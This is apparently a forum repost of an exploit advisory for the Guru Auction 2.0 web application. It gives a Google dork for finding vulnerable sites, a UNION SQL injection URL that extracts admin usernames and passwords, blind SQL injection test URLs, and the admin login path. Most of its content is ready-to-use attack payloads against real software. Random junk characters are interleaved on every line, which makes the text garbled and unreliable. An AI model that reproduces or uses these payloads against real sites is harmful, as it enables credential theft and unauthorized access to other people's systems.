Guru Auction 2.0 Multiple SQL Injection Vulnerabilities: {9 B3 v; g n" B9 H1 C
6 [- z5 G- ^* Q8 y8 V/ Z$ y
作者 : v3n0m
4 r% J' D0 \5 ]" @4 q/ e. s应用 : Guru Auction 2.0" H5 Q: @ c: l. }* H. [" t
Price : $49
3 i1 T* A. i4 X! `6 k* V' UVendor : http://www.guruscript.com/
5 l) w+ a x6 e4 K: [Google Dork : inurl:subcat.php?cate_id=
) Q* z2 F3 X3 `+ h ( u- W/ t6 E9 H& e3 B
SQLi p0c:
- I: g- T' G0 H: r3 t0 }~~~~~~~~~~
; U" C# a4 L2 Z. f) V$ E+ f5 A+ Whttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
( u) d7 U: e1 s7 U 1 ^1 T8 _" L: u
+ I" G' N, p8 ]1 o
盲注 p0c:1 \6 r- `+ B. Q7 `& B7 F) o5 l
~~~~~~~~~~
6 M9 |% {1 V4 x! W' u: b: }* nhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
4 J% r: {( M& v2 `7 G* I4 v3 s/ ]http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
. T: _2 {7 e) P2 [ , V% u* {& c l: X9 o& O& w, X9 z
管理登录入口:
3 V$ V' c G M% R6 p3 t~~~~~~~~~~
, X! k% L1 b1 R8 A0 S$ A6 rhttp://domain.tld/[path]/admin/: ?7 {2 U7 J3 \/ R3 n
|
发表于 2012-12-31 09:24:05
收藏
支持
反对